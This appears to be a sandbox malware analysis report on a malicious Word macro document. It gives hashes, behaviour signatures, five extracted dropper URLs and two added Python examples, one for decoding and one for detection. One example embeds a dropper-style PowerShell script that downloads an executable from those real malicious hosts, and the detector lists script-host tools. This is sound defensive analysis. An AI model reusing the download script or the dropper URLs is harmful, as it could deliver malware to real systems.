Analysis

  • max time kernel
    60s
  • max time network
    9s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    19-07-2020 00:59

General

  • Target

    9f1bd1e4bebe59767443c433a11f963542c021708066d5fad3f8b5bb1d6a3380.doc

  • Size

    235KB

  • MD5

    ef9fb079fa033814c89b585dd3f45a2e

  • SHA1

    e121160f9e43eaa377a627593aea7ba0bb662cf8

  • SHA256

    9f1bd1e4bebe59767443c433a11f963542c021708066d5fad3f8b5bb1d6a3380

  • SHA512

    e265082acad53da32566f32cbdc0cecc72a99476b30ee5973fd571aa183bc444eb4684c0461839d4a2f3843a5f034911a1238f5583b4e5d3bfc385cc337e4b5c

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Source
  • URLs
    exe.dropper    http://ta-behesht.ir/images/Provx00a/
    exe.dropper    http://tatcogroup.ir/wp-admin/UC/
    exe.dropper    http://tcpartner.ru/wp-includes/nr8/
    exe.dropper    http://tepcian.utcc.ac.th/wp-admin/SquR/
    exe.dropper    http://ourproductreview.in/pokjbg746ihrtr/a1kzwc/
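The dropper URLs above are what an analyst recovers by decoding the PowerShell `-e` argument (base64 over UTF-16LE) and pulling the `@`-separated download list out of the script. The following is an added example of that extraction step, not the sandbox's own extractor and not the document's real payload: the sample script is constructed here to carry the five URLs listed above in the layout Emotet-era droppers used, and the helper names are arbitrary.

```python
import base64
import re

# Constructed sample: a dropper-style PowerShell script embedding the five URLs
# this report lists. It is NOT the real encoded command from the sandbox run.
SAMPLE_SCRIPT = (
    "$u='http://ta-behesht.ir/images/Provx00a/@http://tatcogroup.ir/wp-admin/UC/@"
    "http://tcpartner.ru/wp-includes/nr8/@http://tepcian.utcc.ac.th/wp-admin/SquR/@"
    "http://ourproductreview.in/pokjbg746ihrtr/a1kzwc/'.Split('@');"
    "foreach($x in $u){try{(New-Object Net.WebClient).DownloadFile($x,$env:TEMP+'\\a.exe');break}catch{}}"
)

URL_RE = re.compile(r"https?://[^\s'\"@<>]+", re.IGNORECASE)


def encode_command(script):
    """Encode the way powershell -EncodedCommand expects: base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(arg):
    """Reverse of encode_command. Re-pads '=' because some loaders strip padding."""
    padded = arg + "=" * (-len(arg) % 4)
    return base64.b64decode(padded).decode("utf-16-le")


def is_encoded_flag(token):
    # powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
    t = token.lower()
    return t.startswith("-e") and "-encodedcommand".startswith(t)


def extract_urls(script):
    """Return every http(s) URL in a decoded script, in order of appearance."""
    return URL_RE.findall(script)


def extract_from_cmdline(cmdline):
    """Given a full command line such as 'powersheLL -e <b64>', decode and pull URLs.
    Matching on the flag rather than the binary name copes with case tricks
    like 'powersheLL'."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens):
        if is_encoded_flag(tok) and i + 1 < len(tokens):
            return extract_urls(decode_encoded_command(tokens[i + 1]))
    return extract_urls(cmdline)


if __name__ == "__main__":
    cmd = "powersheLL -e " + encode_command(SAMPLE_SCRIPT)
    for url in extract_from_cmdline(cmd):
        print(url)
```

Running it prints the five dropper URLs in the order the script would try them; the first host that serves a file wins, which is why all five belong in the IoC set even though only one download normally completes.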

Signatures

  • Modifies system certificate store 2 TTPs 9 IoCs
  • Modifies registry class 280 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Drops file in System32 directory 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Blacklisted process makes network request 10 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9f1bd1e4bebe59767443c433a11f963542c021708066d5fad3f8b5bb1d6a3380.doc"
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: AddClipboardFormatListener
    PID:1296
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e [base64-encoded command not reproduced here]
    1⤵
    • Modifies system certificate store
    • Process spawned unexpected child process
    • Suspicious behavior: EnumeratesProcesses
    • Drops file in System32 directory
    • Suspicious use of AdjustPrivilegeToken
    • Blacklisted process makes network request
    PID:1068
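The "Process spawned unexpected child process" signature fires because a script host starts under an Office application, which has no legitimate reason to launch PowerShell. The block below is an added example of that detection logic run over constructed Sysmon-style events; it is not the sandbox's rule or its telemetry. The events mirror the two processes above, but the parent/child link between PID 1296 and PID 1068 is an assumption the signature implies rather than something the listing states, and the third (benign) event is invented to show the rule does not flag every child of WINWORD.

```python
import ntpath

# Constructed sample events (Sysmon-like shape). Not the report's raw telemetry.
DOC = r"C:\Users\Admin\AppData\Local\Temp\9f1bd1e4bebe59767443c433a11f963542c021708066d5fad3f8b5bb1d6a3380.doc"
EVENTS = [
    {"pid": 1296, "ppid": 700,  # parent PID assumed
     "image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "cmdline": rf'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "{DOC}"'},
    {"pid": 1068, "ppid": 1296,  # link to WINWORD assumed; payload is a placeholder
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe",
     "cmdline": "powersheLL -e JABhAD0AMQA="},
    {"pid": 2044, "ppid": 1296,  # invented benign child: Office print helper
     "image": r"C:\Windows\splwow64.exe",
     "cmdline": r"C:\Windows\splwow64.exe 12288"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}


def basename(path):
    # Lower-case so 'powersheLL.exe' still matches the allowlist entry.
    return ntpath.basename(path).lower()


def uses_encoded_command(cmdline):
    """True if any token is an unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...)."""
    for tok in cmdline.split():
        t = tok.lower()
        if t.startswith("-e") and "-encodedcommand".startswith(t):
            return True
    return False


def find_office_spawned_script_hosts(events):
    """Flag script hosts whose parent is an Office application."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent is None:
            continue
        if basename(parent["image"]) in OFFICE_APPS and basename(e["image"]) in SCRIPT_HOSTS:
            findings.append({
                "pid": e["pid"],
                "parent_pid": parent["pid"],
                "parent": basename(parent["image"]),
                "child": basename(e["image"]),
                "encoded_command": uses_encoded_command(e["cmdline"]),
            })
    return findings


if __name__ == "__main__":
    for f in find_office_spawned_script_hosts(EVENTS):
        print(f)
```

The encoded-command flag is reported alongside the parent/child match rather than used as a second condition: an Office-spawned `cmd.exe` or `wscript.exe` with a plain command line is still worth an alert, and the flag just raises the priority.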

Network

MITRE ATT&CK Enterprise v6

Downloads

  • memory/1296-2-0x0000000008830000-0x0000000008834000-memory.dmp

    Filesize

    16KB

  • memory/1296-5-0x000000000AA70000-0x000000000AA74000-memory.dmp

    Filesize

    16KB

  • memory/1296-6-0x000000000BAF0000-0x000000000BAF4000-memory.dmp

    Filesize

    16KB